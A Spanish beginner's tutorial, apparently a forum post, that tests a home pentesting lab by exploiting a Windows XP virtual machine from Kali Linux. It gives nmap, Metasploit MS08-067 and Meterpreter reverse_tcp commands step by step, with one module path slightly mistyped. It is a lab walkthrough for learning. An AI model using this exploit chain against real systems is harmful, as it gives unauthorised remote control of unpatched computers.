Este tutorial está puramente hecho con fines educativos, no me hago responsable por la manera en que se usen los conocimientos aquí obtenidos.
¿Que tal todo viejas? Bienvenidos de nuevo a este tutorial de como armar tu laborario de pentesting para poder practicar kacking sin que manches tu expediente. En esta parte final vamos a probar nuestro laboratorio de pentesting a ver si está todo funcional, y la manera en que lo probaremos será hackeando la máquina de Windows XP.
Ya deberían tener en Virtualbox las maquinas virtuales necesarias, Kali Linux y Windows XP. Si no es así probablemente te perdiste los posts anteriores, así que te recomiendo pasar por ahí para que puedas poner en funcionamiento esta parte del tutorial.
|
Procedimientos:
Primero abrimos Virtualbox para configurar la conexión de nuestras máquinas entre sí. Deben tener al menos las tres máquinas virtuales que creamos anteriormente, algo así:
Entren en la configuración de la máquina de Kali Linux como hemos hecho anteriormente (click derecho, configuración) y busquen el menu de la "red". Asegurense de que el adaptador de red este habilitado y en la opción "conectado a" pongan "Adaptador solo-anfitrión". De esta manera su máquina virtual se conectará solamente a una red creada por Virtualbox, a la cual solo se pueden conectar su computadora real y las máquinas virtuales. Debería quedar así:
Le dan al botón aceptar y ya está hecho, ahora la máquina de Kali está conectada a la red interna y se puede comunicar con las demás computadoras dentro de ella. Hagan lo mismo con la máquina de Windows XP, y cuando terminen ya todo estará configurado para empezar a probar. Inicien las dos máquinas, la de Kali y la de Windows XP (si tienen poca ram, cierren todos los programas que tienen abierto)
Todo listo. Ahora empecemos en Windows XP verificando que el Firewall esté desactivado. Se supone que es una guia para principiantes, y con el Firewall activado ya sería mucho mas complicado entender el proceso. Aquí lo vemos desactivado (se puede ver diferente dependiendo de la versión del windows)
Ahora abrimos el símbolo del sistema (cmd). Se abre presionando alt + r, escriben "cmd" (sin las comillas) y le dan enter.
Con el cmd abierto ahora debemos averiguar la dirección IP de esta máquina, que sería una serie de números que la identifican en la red para que los otros sistemas puedan ubicarla. Esto se hace fácilmente escribiendo "ipconfig" y pulsando enter. De ahi sacan la dirección IP que saldría en el mismo sitio que señalo en la siguiente imagen:
(Solo es una imagen de referencia, los números lo deben copiar de su máquina virtual)
Anoten la dirección IP en alguna parte y ahora nos vamos a la máquina de Kali Linux. En ella abrimos la terminal como hicimos antes (el icono de la barra superior que sale algo así: >_ ) y probamos hacerle ping a la dirección que copiamos de la máquina de Windows XP. Hacer ping es como preguntar "¿hay alguien ahí?" en la dirección proporcionada y esperar un tiempo a ver si algun sistema responde. Normalmente el Firewall desactiva esto por seguridad, pero como tenemos el Firewall desactivado deberíamos recibir una respuesta. Entonces, como decía, escribimos "ping xxx.xxx.xxx.xxx" (cambiando las "x" por la dirección que le corresponde a la máquina de windows) y le damos enter. Les debería salir algo así:
Si no les sale error entonces todo está bien. Denle a las teclas ctrl + c para que se detenga y empecemos con la parte de hacking.
Tiempo de explicaciones, recomendado leerlo. Para hackear una computadora, es necesario primero analizarla para encontrar los servicios que corren en ella. Estos servicios abren un puerto, que es una entrada o salida de datos que permite que los sistemas exteriores establezcan una comunicación con esta computadora en ese puerto.
Una vez analizada la computadora se le busca a uno de esos servicios una vulnerabilidad que pueda ser explotada. Una vulnerabilidad es como una falla donde se puede engañar al sistema y hacer que este haga lo que nosotros queramos. A esta vulnerabilidad se le aplica un exploit, el cual se encarga de permitir la entrada de un payload a la máquina objetivo. El payload es lo que ya permite que hagas lo que quieras con la máquina despues de subírselo.
Veamoslo represantado de otra manera: una vacuna. Para aplicarla primero buscas una vena (sería la vulnerabilidad de algún servicio). Cuando la encuentras, con la aguja (exploit) atraviesas la piel hasta que llegas a la vena, y dentro de esta inyectas dicha vacuna (payload).
Ahora que ya está todo medio explicado, procedamos a aplicarlo en la práctica. Dentro de la misma terminal que abrieron en Kali Linux, escriban esto "nmap -O xxx.xxx.xxx.xxx" y denle enter. Como siempre, remplacen las "x" con la IP de su máquina de windows. Debería salirles algo así:
Ahí vemos que en mi caso la máquina tiene tres puertos abiertos, es decir, tres servicios corriendo en los que que podríamos buscar una vulnerabilidad y aplicar un exploit para conseguir nuestro objetivo. Estos puertos son el 135, 139 y 445.
Con esta información ya va siendo hora de que abramos lo que vamos a utilizar para explotar las vulnerabilidades: Metasploit. Para ello primero hay que habilitar unos servicios en Kali Linux que no vienen activados por defecto y que son necesarios para que este funcione. En la misma terminal donde están haciendo todo (o en otra si cerraron la anterior) escriban lo siguiente: "service postgresql start" (sin comillas) y le dan enter. Esto es para iniciar un servidor SQL que Metasploit necesita para guardar varios datos. Esto durara unos segundos iniciándose y luego debería salir un "ok" verde. Eso indicará que se ha iniciado
Ahora debemos iniciar el servicio de Metasploit para poder usarlo. En la misma terminal escriben esto "service metasploit start" sin comillas y le dan enter. Siendo la primera vez que lo ejecutan se crearan unas bases de datos donde se guardarán varios datos, y luego se iniciaran los servidores necesarios para su funcionamiento. Debería quedar así:
Ahora ejecuten la consola del metasploit poniendo el siguiente comando en la ventana del terminal: "msfconsole". Le dan enter y esperan un rato (al menos asi fue en mi caso). Les saldra un dibujo ascii y la información de la versión de Metasploit que están usando. La consola de Metasploit estará esperando su próxima instrucción.
Para hackear la otra máquina virtual debemos utilizar una vulnerabilidad dentro de los servicios de ella. Ya que Windows XP tiene sus años y nosotros dejamos el Firewall desactivado y todo eso, no hace falta matarse buscando cual exploit usar. Primero empecemos buscando exploits sobre "netapi" en Metasploit. Escriban "search netapi" y denle enter. Les saldrán varios exploits, pero habrá uno en especial que usaremos:
Como vemos sale un exploit para el servicio de servidor de Windows. Para usarlo escriban "use exploit/windows/smb/ms08/067_netapi" y le dan enter. Ahora Metasploit señalará que lo tenemos seleccionado
No sabemos como sirve el exploit, así que escribimos "show options" y le damos enter para que nos muestre las opciones.
Como vemos, nos dice que debemos especificar la dirección del objetivo. Ponemos el siguiente comando: "set RHOST xxx.xxx.xxx.xxx". De nuevo, cambien las "x" por su dirección IP respectiva. Le dan enter y el programa les mostrará el cambio.
Ahora debemos elegir el payload que vamos a usar. En este caso usaremos uno que se llama Meterpreter que nos permite hacer varias cosas. Para hacerlo ponemos el siguiente comando: "set PAYLOAD windows/meterpreter/reverse_tcp". Le damos enter y de nuevo nos mostrará el cambio:
Este payload tambien necesita que específiquemos la IP donde se abrirá la sesión del Meterpreter. Para hacerlo primero necesitamos averiguar nuestra IP, escribiendo "ifconfig" y dandole enter.
Vemos cual es nuestra ip (como les dije antes, la imagen solo es de referencia, busquen la suya) y listo. Ahora procedemos a escribir "set LHOST xxx.xxx.xxx.xxx" (cambiandole las "x" de nuevo) y el programa nos responderá acordemente.
Ya tenemos todo listo. Ahora falta la ejecución de todo. Solo escriban "exploit" y denle enter. Si terminan con algo que dice "meterpreter" significa que está todo listo. Enjoy.
Ahora que tenemos abierta la sesión de meterpreter podemos hacer muchas cosas en la máquina que hemos hackeado. En este caso yo he hecho algo especial para los taringueros (y te lo muestro). Empezamos abriendo la shell de Windows escribiendo "shell" y dandole enter.
Si tienen conocimientos medios de windows sabrán que acaban de abrir una consola del símbolo del sistema. Ahora continuamos yendo al disco C: y luego de eso escribimos nuestro mensaje.
Mientras tanto, el usuario de windows estaba revisando sus archivos cuando encuentra algo desconocido...
Lo abre y se encuentra con una sorpresa que procede a denunciar.
Listo, ya han hackeado una computadora. Este es el primer paso que han tomado para adentrarse en el hacking, y aunque parezca difícil todo esto, apenas están nadando en un charco mientras lo bueno está en el oceano. Pero aprender hacking también tiene su truco, recuerdo haberlo leido en una revista de videojuegos cuando era pequeño. Es el truco de las tres "P": Practica, Paciencia y Perseverancia. Si siguen practicándolo constantemente con el tiempo conseguirán una habilidad increible que quizás hasta les consiga un trabajo digno. Solo ponganle esfuerzo en aprender y ahí les irá bien.
Y así acaba este tutorial de hacking. Si les ha funcionado todo correctamente, perfecto, ahora pueden continuar escuadriñando el internet en busca de más tutoriales. Intenten hackear la máquina virtual con el firewall activado, etc. Yo seguiré posteando más tutoriales de hacking, pero probablemente me tomaré más tiempo en hacerlos, ya que tampoco estoy tan avanzado en esto.
Si no les ha funcionado, no duden en hablarme de su problema y trataré de solventarlo.
Espero que les haya ido bien y que sigan progresando. Comenten lo que piensen, compartan el post y nos vemos hasta la próxima.